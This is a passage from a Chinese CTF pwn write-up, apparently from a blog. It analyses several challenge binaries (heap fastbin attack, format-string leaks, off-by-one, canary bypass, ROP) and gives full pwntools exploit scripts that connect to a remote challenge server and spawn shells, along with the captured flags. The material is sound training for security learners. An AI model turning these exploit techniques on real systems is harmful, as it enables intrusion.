\u4f2a\u9020 Chunk Size\uff1a\u5728 chunk_size \u6570\u7ec4 (0x601360) \u5904\u5229\u7528 create \u5199\u5165\u4e00\u4e2a\u5408\u6cd5\u7684 Fastbin size\uff08\u5982 0x71\uff09 \u3002\n\u52ab\u6301 fd \u6307\u9488\uff1a\u7533\u8bf7\u4e00\u4e2a\u5bf9\u5e94\u5927\u5c0f\u7684 chunk \u5e76\u91ca\u653e\uff0c\u7136\u540e\u5229\u7528 edit \u5c06\u5176 fd \u6307\u9488\u8986\u76d6\u4e3a\u4f2a\u9020\u7684 chunk \u5730\u5740 (0x601358)\u3002\n\u8986\u76d6 GOT \u8868\uff1a\u8fde\u7eed\u7533\u8bf7\u4e24\u6b21\u5c06\u4f2a\u9020\u7684 chunk \u5206\u914d\u51fa\u6765\uff0c\u5229\u7528\u8be5 chunk \u6ea2\u51fa\u8986\u76d6\u5230 chunks \u6570\u7ec4 (0x6013C0) \uff0c\u5c06 chunks[0] \u4fee\u6539\u4e3a atoi \u7684 GOT \u8868\u5730\u5740 (0x601300) \u3002\n\u52ab\u6301\u6267\u884c\u6d41\uff1a\u518d\u6b21\u8c03\u7528 edit \u4fee\u6539 chunks[0]\uff0c\u5c06 atoi \u7684 GOT \u8868\u6761\u76ee\u66ff\u6362\u4e3a\u7a0b\u5e8f\u81ea\u5e26\u7684\u540e\u95e8\u51fd\u6570 shell (0x400C26) \u3002\n\u89e6\u53d1\u540e\u95e8\uff1a\u5728\u83dc\u5355\u8f93\u5165\u65f6\u8f93\u5165 sh\uff0c\u89e6\u53d1 atoi(\"sh\")\uff0c\u5373\u7b49\u540c\u4e8e\u6267\u884c system(\"\/bin\/sh\")\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\np = remote('1.95.7.68', 2127)\n\ndef create(size):\n    p.sendlineafter(b'choice: n', b'1')\n    p.sendlineafter(b'Size: n', str(size).encode())\n\ndef edit(index, content):\n    p.sendlineafter(b'choice: n', b'2')\n    p.sendlineafter(b'Index: n', str(index).encode())\n    p.sendafter(b'Contents: n', content)\n\ndef delete(index):\n    p.sendlineafter(b'choice: n', b'3')\n    p.sendlineafter(b'Index: n', str(index).encode())\n\ncreate(0x71)\ncreate(0x68)\n\ndelete(1)\n\nfake_chunk_addr = 0x601358\nedit(1, p64(fake_chunk_addr))\n\ncreate(0x68)\ncreate(0x68)\n\ngot_atoi = 0x601300\npayload = b'a' * 0x58 + p64(got_atoi)\nedit(3, payload)\n\nshell_addr = 0x400C26\nedit(0, p64(shell_addr))\n\np.sendlineafter(b'choice: n', b'sh')\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{8e5f46fb-d94e-4b0d-82c2-eba8949d255a}<\/code><\/pre>\n\n\n\n
bllhl_fmt<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6808\u5730\u5740\u6cc4\u9732\u3001ROP\u94fe\u6784\u9020\u4ee5\u53ca\u6587\u4ef6\u6d41\u7be1\u6539\uff08FSOP\uff09<\/p>\n\n\n\n
\u6f0f\u6d1e\u5b58\u5728\u4e8e main\u51fd\u6570\u7684\u6b7b\u5faa\u73af\u4e2d<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
int main() {\n    char format[280]; \/\/ \u7f13\u51b2\u533a\n    init_io();\n\n    while ( 1 ) {\n        strcpy(format, \"polarctf\"); \/\/ \u7f13\u51b2\u533a\u524d8\u5b57\u8282\u56fa\u5b9a\n        printf(\"hello what are you say...\");\n\n        \/\/ \u5c06\u7528\u6237\u8f93\u5165\u62fc\u63a5\u5230\u56fa\u5b9a\u5b57\u7b26\u4e32\u4e4b\u540e\n        if ( !fgets(&format[8], 256, stdin) )\n            break;\n\n        printf(format); \/\/ <--- \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\n    }\n    return 0;\n}\n\n\u6f0f\u6d1e\u70b9\uff1aprintf(format) \u76f4\u63a5\u5c06\u5305\u542b\u7528\u6237\u8f93\u5165\u7684 format \u7f13\u51b2\u533a\u4f5c\u4e3a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6267\u884c\uff0c\u672a\u505a\u4efb\u4f55\u9650\u5236\uff0c\u5bfc\u81f4\u4e86\u4efb\u610f\u5730\u5740\u8bfb\u5199\u6f0f\u6d1e\u3002\n\n\u4fdd\u62a4\u673a\u5236\uff1a\u7a0b\u5e8f\u5f00\u542f\u4e86 PIE\u3001Canary \u4ee5\u53ca Full RELRO\u3002\u7531\u4e8e Full RELRO \u7684\u5b58\u5728\uff0cGOT \u8868\u662f\u53ea\u8bfb\u7684\uff0c\u65e0\u6cd5\u4f7f\u7528\u5e38\u89c4\u7684\u8986\u76d6 printf@got \u4e3a system \u7684\u89e3\u6cd5\uff0c\u5fc5\u987b\u8f6c\u6218\u6808\u533a\uff08Stack\uff09\u90e8\u7f72 ROP \u94fe\u3002<\/code><\/pre>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u672c\u9898\u5305\u542b\u4e00\u4e2a while(1) \u6b7b\u5faa\u73af\uff0c\u6574\u4e2a\u5229\u7528\u8fc7\u7a0b\u5206\u4e3a 5 \u4e2a\u9636\u6bb5\uff1a\n\n\u6cc4\u9732 PIE \u57fa\u5740\uff1a\u5229\u7528 %p \u8bfb\u53d6\u6808\u4e0a\u6b8b\u7559\u7684\u7a0b\u5e8f\u5730\u5740\uff08\u5982 main \u6216 _start \u7684\u6b8b\u7559\u6307\u9488\uff09\uff0c\u8ba1\u7b97\u51fa\u7a0b\u5e8f\u7684 PIE Base\u3002\n\n\u6cc4\u9732 Libc \u57fa\u5740\uff1a\u62ff\u5230 PIE \u540e\uff0c\u6784\u9020 %s \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u8bfb\u53d6\u88c5\u8f7d\u5728 ELF \u4e2d\u7684 printf@got \u7684\u771f\u5b9e\u5185\u5b58\u5730\u5740\uff0c\u4ece\u800c\u8ba1\u7b97\u51fa Libc Base\u3002\n\n\u5b9a\u4f4d\u771f\u5b9e\u6808\u5730\u5740\uff1a\u5229\u7528\u5df2\u7ecf\u83b7\u53d6\u7684 Libc Base\uff0c\u8bfb\u53d6 libc \u4e2d\u5168\u5c40\u53d8\u91cf environ \u7684\u6307\u9488\u5185\u5bb9\u3002environ \u59cb\u7ec8\u6307\u5411\u6808\u4e0a\u7684\u73af\u5883\u53d8\u91cf\u533a\u57df\uff0c\u8bfb\u53d6\u5b83\u5373\u53ef\u83b7\u5f97\u7edd\u5bf9\u6808\u5730\u5740\u3002\u968f\u540e\u901a\u8fc7\u56fa\u5b9a\u7684\u504f\u79fb\u91cf\u8ba1\u7b97\u51fa main \u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u5b58\u653e\u4f4d\u7f6e\u3002\n\n\u5206\u6bb5\u5199\u5165 ROP \u94fe\uff1a\u5229\u7528 fmtstr_payload \u8fdb\u884c\u4efb\u610f\u5730\u5740\u5199\u3002\u4e3a\u4e86\u9632\u6b62\u4e00\u6b21\u6027\u5199\u5165\u5bfc\u81f4\u6570\u636e\u8fc7\u957f\u88ab fgets(256) \u622a\u65ad\uff0c\u5c06 ROP \u94fe\uff08pop rdi -> \/bin\/sh -> system\uff09\u62c6\u5206\u4e3a 4 \u6b21\u5355\u72ec\u53d1\u9001\uff0c\u4f9d\u6b21\u8986\u76d6\u5728 main \u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u4e0a\u3002\n\n\u7be1\u6539 IO \u6d41\u8df3\u51fa\u5faa\u73af\uff1a\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5c06 _IO_2_1_stdin_ \u7684 _fileno\uff08\u6587\u4ef6\u63cf\u8ff0\u7b26\uff09\u4fee\u6539\u4e3a -1\u3002\u5f53\u4e0b\u4e00\u6b21\u6267\u884c fgets \u65f6\uff0c\u7531\u4e8e\u65e0\u6cd5\u4ece -1 \u63cf\u8ff0\u7b26\u8bfb\u53d6\u6570\u636e\uff0cfgets \u4f1a\u8fd4\u56de NULL \u4ece\u800c\u89e6\u53d1 break \u8df3\u51fa\u6b7b\u5faa\u73af\u3002\u7a0b\u5e8f\u6267\u884c return 0 \u65f6\uff0c\u52ab\u6301\u7684 ROP \u94fe\u88ab\u6210\u529f\u89e6\u53d1\uff0c\u83b7\u53d6 Shell\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'amd64'\ncontext.os = 'linux'\n\nelf = ELF('.\/pwn1')\nlibc = ELF('.\/libc.so.6')\n\np = remote('1.95.7.68', 2105)\n\np.recvuntil(b'say')\n\npayload1 = b''\nfor i in range(30, 60):\n    payload1 += f'%{i}$p.'.encode()\n\np.sendline(payload1)\np.recvuntil(b'polarctf')\nleaks = p.recvline().strip().split(b'.')\n\npie_base = 0\nfor val in leaks:\n    if val.startswith(b'0x'):\n        try:\n            v = int(val, 16)\n            if (v & 0xfff) == 0x20e and v > 0x500000000000:\n                pie_base = v - 0x120e\n                break\n            elif (v & 0xfff) == 0x0c0 and v > 0x500000000000:\n                pie_base = v - 0x10c0\n                break\n        except Exception:\n            pass\n\nelf.address = pie_base\n\np.recvuntil(b'say')\npayload2 = b'%8$sAAAA' + p64(elf.got['printf'])\np.sendline(payload2)\n\np.recvuntil(b'polarctf')\nleak_raw = p.recvuntil(b'AAAA', drop=True)\nprintf_libc = u64(leak_raw.ljust(8, b'x00'))\nlibc.address = printf_libc - libc.symbols['printf']\n\np.recvuntil(b'say')\npayload_env = b'%8$sAAAA' + p64(libc.sym['environ'])\np.sendline(payload_env)\n\np.recvuntil(b'polarctf')\nleak_raw = p.recvuntil(b'AAAA', drop=True)\nenviron_addr = u64(leak_raw.ljust(8, b'x00'))\n\nOFFSET = 0x120\nmain_ret_addr = environ_addr - OFFSET\n\nrop_libc = ROP(libc)\npop_rdi = rop_libc.find_gadget(['pop rdi', 'ret'])[0]\nret_gadget = pop_rdi + 1\nbin_sh = next(libc.search(b'\/bin\/shx00'))\nsystem = libc.symbols['system']\n\nwrites = [\n    (main_ret_addr, ret_gadget),\n    (main_ret_addr + 8, pop_rdi),\n    (main_ret_addr + 16, bin_sh),\n    (main_ret_addr + 24, system)\n]\n\nfor addr, val in writes:\n    p.recvuntil(b'say')\n    payload = fmtstr_payload(7, {addr: val}, numbwritten=8, write_size='short')\n    p.sendline(payload)\n    sleep(0.1)\n\np.recvuntil(b'say')\nstdin_fileno = libc.symbols['_IO_2_1_stdin_'] + 0x70\npayload4 = fmtstr_payload(7, {stdin_fileno: 0xffffffff}, numbwritten=8, write_size='short')\np.sendline(payload4)\n\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{34302bd0-5329-45db-84b6-f007453bf1bd}<\/code><\/pre>\n\n\n\n
bllhl_book<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
input_BUG \u6f0f\u6d1e\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
__int64 __fastcall input_BUG(_BYTE *a1, int a2)\n{\n  int i;\n  for ( i = 0; ; ++i )\n  {\n    if ( read(0, a1, 1u) != 1 ) return 0xFFFFFFFFLL;\n    if ( *a1 == 10 ) break;\n    ++a1;\n    if ( i == a2 ) break; \/\/ \u8fb9\u754c\u5224\u65ad\n  }\n  *a1 = 0; \/\/ \u6f0f\u6d1e\u70b9\uff1aOff-By-One Null Byte \u8986\u76d6\n  return 0;\n}\n\n\u5f53\u8c03\u7528 change_author_name \u6267\u884c input_BUG(g_lib, 32) \u65f6\uff0c\u5982\u679c\u8f93\u5165\u6b63\u597d 32 \u4e2a\u5b57\u8282\uff0cfor \u5faa\u73af\u4f1a\u5728 i == 32 \u65f6 break\u3002\u968f\u540e\u6267\u884c *a1 = 0;\uff0c\u5c06\u4e00\u4e2a\u7a7a\u5b57\u8282 x00 \u5199\u5230\u4e86 g_lib[32] \u7684\u4f4d\u7f6e\u3002\n\n\u800c\u5728\u7a0b\u5e8f\u7684 BSS \u6bb5\u4e2d\uff0cg_lib\uff08\u5168\u5c40\u4f5c\u8005\u540d\uff0c\u957f32\u5b57\u8282\uff09\u7d27\u6328\u7740\u5b58\u653e Book \u7ed3\u6784\u4f53\u6307\u9488\u7684\u6570\u7ec4\u3002\u56e0\u6b64\uff0cg_lib[32] \u6b63\u597d\u662f book[0] \u6307\u9488\u7684\u6700\u4f4e\u5b57\u8282\uff08LSB\uff09\u3002<\/code><\/pre>\n\n\n\n
\u5806\u5e03\u5c40<\/p>\n\n\n\n
create_a_book\u51fd\u6570\u4e2d\uff0c\u7a0b\u5e8f\u4f7f\u7528\u4e86\u7279\u6b8a\u7684\u5185\u5b58\u5206\u914d<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
ptr = (char *)aligned_alloc(256, 256); \/\/ 256\u5b57\u8282\u5bf9\u9f50\ns = (__int64 *)(ptr + 128); \/\/ Book \u7ed3\u6784\u4f53\u653e\u5728\u5806\u5757\u504f\u79fb 0x80 \u5904\n\n\u56e0\u4e3a 256 \u5b57\u8282\u5bf9\u9f50\uff0cptr \u7684\u5730\u5740\u672b\u5c3e\u5fc5\u7136\u662f 0x00\u3002Book \u7ed3\u6784\u4f53 s \u7684\u5730\u5740\u672b\u5c3e\u5fc5\u7136\u662f 0x80\u3002\n\u7ed3\u5408\u524d\u9762\u7684 Off-By-One \u6f0f\u6d1e\uff0c\u5f53\u6211\u4eec\u628a book[0] \u6307\u9488\u7684\u6700\u4f4e\u5b57\u8282\u4ece 0x80 \u8986\u76d6\u4e3a 0x00 \u65f6\uff0cbook[0] \u7684\u6307\u9488\u4f1a\u5411\u524d\u504f\u79fb 128 \u5b57\u8282\uff0c\u5b8c\u7f8e\u6307\u5411\u6211\u4eec\u53ef\u63a7\u7684 ptr\uff08Book \u63cf\u8ff0\u4fe1\u606f\u7f13\u51b2\u533a\uff09<\/code><\/pre>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u4f2a\u9020\u7ed3\u6784\u4f53\uff1a\u521b\u5efa\u4e00\u4e2a Book (id=1)\uff0c\u5728\u5176 description \u533a\u57df\u5199\u5165\u4f2a\u9020\u7684 Book \u7ed3\u6784\u4f53\u3002\u5c06 fake book \u7684 name \u6307\u9488\u6307\u5411 puts@got\uff08\u7528\u4e8e\u6cc4\u9732\uff09\uff0cdescription \u6307\u9488\u6307\u5411 0x404018\uff08\u5373 polar_review_cb \u51fd\u6570\u6307\u9488\u7684\u5b58\u653e\u5730\u5740\uff09\n\n\u89e6\u53d1\u6f0f\u6d1e\u5e76\u5e03\u7f72\u53c2\u6570\uff1a\u4f7f\u7528 change_author_name \u8f93\u5165 \/bin\/shx00 \u586b\u5145\u81f3 32 \u5b57\u8282\u3002\u8fd9\u4e0d\u4ec5\u5728 g_lib \u4e2d\u5e03\u7f6e\u4e86 system \u7684\u53c2\u6570\uff0c\u8fd8\u89e6\u53d1\u4e86 Off-By-One \u5c06 book[0] \u6307\u9488\u7be1\u6539\uff0c\u4f7f\u5176\u6307\u5411\u6211\u4eec\u4f2a\u9020\u7684\u7ed3\u6784\u4f53\n\n\u6cc4\u9732 Libc\uff1a\u8c03\u7528 print_book_detail\uff0c\u7a0b\u5e8f\u4f1a\u6253\u5370\u51fa\u4f2a\u9020\u7684 name\uff08\u5373 puts@got \u7684\u771f\u5b9e\u5730\u5740\uff09\uff0c\u8ba1\u7b97\u5f97\u51fa libc \u57fa\u5740\n\n\u52ab\u6301\u6267\u884c\u6d41\uff1a\u8c03\u7528 edit_a_book \u4fee\u6539 id \u4e3a 1 \u7684\u4e66\u3002\u6b64\u65f6\u4f1a\u5411 0x404018\uff08polar_review_cb\uff09\u5199\u5165\u6570\u636e\u3002\u6211\u4eec\u5c06\u5176\u8986\u5199\u4e3a system \u7684\u5730\u5740\uff08\u540c\u65f6\u8865\u4e0a _IO_2_1_stdout_ \u9632\u6b62\u7a0b\u5e8f\u540e\u7eed crash\uff09\n\nGet Shell\uff1a\u8c03\u7528 submit_polar_review\uff0c\u7a0b\u5e8f\u4f1a\u6267\u884c polar_review_cb(g_lib)\uff0c\u5b9e\u9645\u6267\u884c\u7684\u662f system(\"\/bin\/sh\")<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\nfrom pwn import *\n\ncontext.arch = 'amd64'\ncontext.os = 'linux'\n\nelf = ELF('.\/bllhl_book')\nlibc = ELF('.\/libc.so.6')\np = remote('1.95.7.68', 2075)\n\ndef send_author(name):\n    p.sendafter(b'name: n', name)\n\ndef create_book(name_sz, name, desc_sz, desc):\n    p.sendlineafter(b'> n', b'1')\n    p.sendlineafter(b'size: n', str(name_sz).encode())\n    p.sendlineafter(b'chars): n', name)\n    p.sendlineafter(b'size: n', str(desc_sz).encode())\n    p.sendlineafter(b'description: n', desc)\n\ndef change_author(name):\n    p.sendlineafter(b'> n', b'5')\n    p.sendafter(b'name: n', name)\n\ndef print_books():\n    p.sendlineafter(b'> n', b'4')\n\ndef edit_book(book_id, desc):\n    p.sendlineafter(b'> n', b'3')\n    p.sendlineafter(b'edit: n', str(book_id).encode())\n    p.sendlineafter(b'description: n', desc)\n\ndef submit_review():\n    p.sendlineafter(b'> n', b'6')\n\nsend_author(b'An')\n\nfake_struct = flat([\n    1,                  \n    elf.got['puts'],    \n    0x404018,           \n    0x20                \n])\ncreate_book(16, b'dummy', 0x70, fake_struct)\n\npayload = b'\/bin\/shx00'.ljust(32, b'A') + b'n'\nchange_author(payload)\n\nprint_books()\np.recvuntil(b'ID: 1nName: ')\nputs_leak = u64(p.recvline(keepends=False).ljust(8, b'x00'))\nlibc.address = puts_leak - libc.sym['puts']\n\nsystem_addr = libc.sym['system']\nstdout_addr = libc.sym['_IO_2_1_stdout_']\n\nedit_payload = flat([\n    system_addr,\n    stdout_addr\n])\nedit_book(1, edit_payload)\n\nsubmit_review()\n\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{01de9a9b-dfa4-4f78-a5e2-18f9b98e769a}<\/code><\/pre>\n\n\n\n
bllhl_canary++<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3001\u6808\u6ea2\u51fa\u3001\u53cc\u91cdCanary\u673a\u5236\u7ed5\u8fc7,ret2libc<\/p>\n\n\n\n
\u6f0f\u6d1e\u51fd\u6570challenge()\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
1.\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff1a\n\u4ee3\u7801\u6267\u884c read(0, buf, 0x7Fu) \u540e\u76f4\u63a5\u8c03\u7528 printf(buf)\uff0c\u672a\u5bf9\u8f93\u5165\u505a\u683c\u5f0f\u5316\u5904\u7406\u3002\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u8ba1\u7b97\u504f\u79fb\uff0c\u6cc4\u9732\u6808\u4e0a\u7684 Custom Canary (v6)\u3001\u968f\u673a\u6570\u79cd\u5b50 Seed (v7)\u3001\u539f\u751f Canary (v8) \u4ee5\u53ca Libc \u8fd4\u56de\u5730\u5740\n2.\u6808\u6ea2\u51fa\uff1a\n\u4ee3\u7801\u6267\u884c read(0, v5, 0x200u)\uff0c\u5411\u5927\u5c0f\u4ec5 96 \u5b57\u8282\u7684 v5 \u5199\u5165 0x200 \u5b57\u8282\uff0c\u5b58\u5728\u6808\u6ea2\u51fa\n\n\u7ed5\u8fc7\uff1a\n\u7a0b\u5e8f\u5728\u68c0\u6d4b\u9636\u6bb5\u6267\u884c v1 != custom_canary_for(v5, v7)\u3002\u6df1\u5165\u6c47\u7f16\u53d1\u73b0 custom_canary_for \u51fd\u6570\u672b\u5c3e\u7684 mov al, 0 \u4ec5\u4ec5\u6e05\u7a7a\u4e86\u6700\u4f4e\u4f4d\u76841\u4e2a\u5b57\u8282\uff0crax \u9ad856\u4f4d\u4f9d\u7136\u662f\u968f\u673a\u4e71\u7801\u3002\u56e0\u6b64\u5982\u679c\u76f4\u63a5\u6ea2\u51fa\u8986\u76d6\u6808\u7a7a\u95f4\uff0c\u4f1a\u7834\u574f v6 \u548c v7 \u5bfc\u81f4\u6821\u9a8c\u5931\u8d25\u3002\u5fc5\u987b\u901a\u8fc7\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u628a v6\u3001v7 \u548c\u539f\u751f Canary \u5168\u90e8\u6cc4\u9732\uff0c\u5e76\u5728\u6ea2\u51fa\u8986\u76d6\u65f6\u539f\u6837\u5199\u56de\u5230\u5bf9\u5e94\u7684\u6808\u504f\u79fb\u5904\uff0c\u968f\u540e\u5e03\u7f6eROP\u94fe\u62ffShell<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'amd64'\ncontext.os = 'linux'\n\nexe = ELF('.\/pwn1')\nlibc = ELF('.\/libc.so.6')\np = remote('1.95.7.68', 2134)\n\npayload1 = b\"%38$p|%39$p|%41$p|%49$p\"\np.recvuntil(b\"[stage1] format string leak:n\")\np.send(payload1)\np.recvuntil(b\"[echo] \")\n\nleaks = p.recvline().strip().decode().split('|')\n\ndef parse_leak(val):\n    if val == '(nil)':\n        return 0\n    return int(val, 16)\n\nv6 = parse_leak(leaks[0])\nv7 = parse_leak(leaks[1])\ncanary = parse_leak(leaks[2])\nlibc_leak = parse_leak(leaks[3])\n\noffset = libc.sym['__libc_start_main'] + 128\nif hex(libc_leak - offset)[-3:] != '000':\n    if hex(libc_leak).endswith('d90'):\n        offset = 0x29d90\n    elif hex(libc_leak).endswith('083') or hex(libc_leak).endswith('0b3'):\n        offset = 0x24083\n    elif hex(libc_leak).endswith('c87'):\n        offset = 0x21c87\n\nlibc.address = libc_leak - offset\n\npop_rdi = next(libc.search(b'x5fxc3'))\nret = pop_rdi + 1\nsystem = libc.sym['system']\nbin_sh = next(libc.search(b'\/bin\/shx00'))\n\npadding_v5 = b'A' * 96\n\nrop_chain = [\n    padding_v5,\n    p64(v6),\n    p64(v7),\n    p64(0),\n    p64(canary),\n    p64(0),\n    p64(0),\n    p64(0xdeadbeef),\n    p64(ret),\n    p64(pop_rdi),\n    p64(bin_sh),\n    p64(system)\n]\n\npayload2 = b''.join(rop_chain)\n\np.recvuntil(b\"[stage2] overflow now:n\")\np.send(payload2)\n\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{b3d45cae-a8bd-46b6-a2b6-bbcef2653d1b}<\/code><\/pre>\n\n\n\n
where_sh<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1evuln\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
unsigned int vuln()\n{\n  char buf[80]; \/\/ [esp+Ch] [ebp-5Ch] BYREF\n  unsigned int v2; \/\/ [esp+5Ch] [ebp-Ch]\n  v2 = __readgsdword(0x14u);\n  puts(\"Welcome to the challenge!\");\n  read(0, buf, 0x100u);\n  printf(buf);  \/\/ \u6f0f\u6d1e1\uff1a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\n  gets(buf);    \/\/ \u6f0f\u6d1e2\uff1a\u6808\u6ea2\u51fa\u6f0f\u6d1e\n  return __readgsdword(0x14u) ^ v2;\n}<\/code><\/pre>\n\n\n\n
backdoor\u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5047\u7684,\u8fdc\u7a0b\u6ca1\u6709\u540d\u4e3a “1” \u7684\u6587\u4ef6\uff0c\u65e0\u6cd5\u76f4\u63a5\u62ffshell<\/p>\n\n\n\n
\u89e3\u6790<\/p>\n\n\n\n
\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732 Canary\uff1a \u7a0b\u5e8f\u5b58\u5728 printf(buf)\uff0c\u7531\u4e8e\u5f00\u542f\u4e86 Canary \u6808\u4fdd\u62a4\uff0c\u53ef\u4ee5\u901a\u8fc7 %27$p \u6cc4\u9732\u6808\u4e0a\u7684 Canary \u503c\u3002\n\n\u6808\u6ea2\u51fa\uff1a gets(buf) \u4e0d\u9650\u5236\u8f93\u5165\u957f\u5ea6\uff0c\u53ef\u5bfc\u81f4\u6808\u6ea2\u51fa\uff0c\u5229\u7528\u521a\u521a\u6cc4\u9732\u7684 Canary \u4fee\u590d\u6808\u7ed3\u6784\u540e\uff0c\u53ef\u52ab\u6301\u8fd4\u56de\u5730\u5740\u3002\n\nROP\u94fe\u6784\u9020\uff1a \u9898\u76ee\u7559\u4e0b\u7684\u540e\u95e8\u51fd\u6570 system(\"1\") \u65e0\u6cd5\u76f4\u63a5\u5229\u7528\u3002\u4f46\u7a0b\u5e8f\u4e2d\u5bfc\u5165\u4e86 gets \u548c system\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u6808\u6ea2\u51fa\u6784\u9020 ROP \u94fe\uff0c\u5411 bss \u6bb5\u5199\u5165 \"\/bin\/sh\"\uff0c\u5e76\u5c06\u5176\u4f5c\u4e3a\u53c2\u6570\u4f20\u7ed9 system\u3002<\/code><\/pre>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u63a5\u6536\u6b22\u8fce\u4fe1\u606f\u540e\uff0c\u53d1\u9001 %27$p-\uff0c\u622a\u53d6\u8fd4\u56de\u7684\u6570\u636e\u5373\u53ef\u5f97\u5230 Canary\u3002\n\u8ba1\u7b97\u504f\u79fb\uff1a\u7f13\u51b2\u533a buf \u5230 Canary \u7684\u8ddd\u79bb\u4e3a 0x5C - 0x0C = 0x50\uff0880\u5b57\u8282\uff09\uff0c\u518d\u5f80\u540e 12 \u5b57\u8282\u8986\u76d6 ebp \u5230\u8fbe\u8fd4\u56de\u5730\u5740\u3002\npwntools \u81ea\u52a8\u6784\u5efa ROP \u94fe\uff1a\u5148\u8c03\u7528 gets(bss\u5730\u5740) \u63a5\u6536\u8f93\u5165\uff0c\u518d\u8c03\u7528 system(bss\u5730\u5740) \u62ff shell\n\u53d1\u9001 Payload \u89e6\u53d1 ROP \u94fe\uff0c\u8f93\u5165 \/bin\/sh \u83b7\u53d6\u4ea4\u4e92<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'i386'\ncontext.os = 'linux'\n\nelf = ELF('.\/pwn1')\nr = remote('1.95.7.68', 2133)\n\nr.recvuntil(b\"Welcome to the challenge!n\")\nr.sendline(b\"%27$p-\") \n\nleak_data = r.recvuntil(b\"-\")[:-1]\ncanary = int(leak_data, 16)\n\nrop = ROP(elf)\nbss_addr = elf.bss() + 0x100  \n\nrop.gets(bss_addr)\nrop.system(bss_addr)\n\npayload = b\"A\" * 80 + p32(canary) + b\"B\" * 12 + rop.chain()\n\nr.sendline(payload)\nr.sendline(b\"\/bin\/sh\")\nr.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{e65c093a-0e61-4e73-bba7-49025ee9e323}<\/code><\/pre>\n\n\n\n
one_hundred<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
32\u4f4d\u7a0b\u5e8f\uff08i386-32-little<\/code>\uff09\uff0c\u5f00\u542fNX\uff0c\u672a\u5f00\u542fPIE\u548cCanary\uff0cPartial RELRO \u610f\u5473\u7740 GOT \u8868\u53ef\u5199\u3002<\/p>\n\n\n\n
\u7a0b\u5e8f\u5728 vuln()\u548c back()\u51fd\u6570\u4e2d\u76f4\u63a5\u4f7f\u7528 printf(buf)\uff0c\u5b58\u5728\u4e24\u5904\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
\u7a0b\u5e8f\u903b\u8f91\u94fe\u4e3a vuln<\/code> -> back<\/code> -> door<\/code><\/p>\n\n\n\n
vuln() \u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
 printf(buf);  \/\/ \u6f0f\u6d1e\u70b91\uff1a\u5b58\u5728\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/code><\/pre>\n\n\n\n
back() \u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
  printf(buf);  \/\/ \u6f0f\u6d1e\u70b92\uff1a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/code><\/pre>\n\n\n\n
door() \u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6d41\u7a0b<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
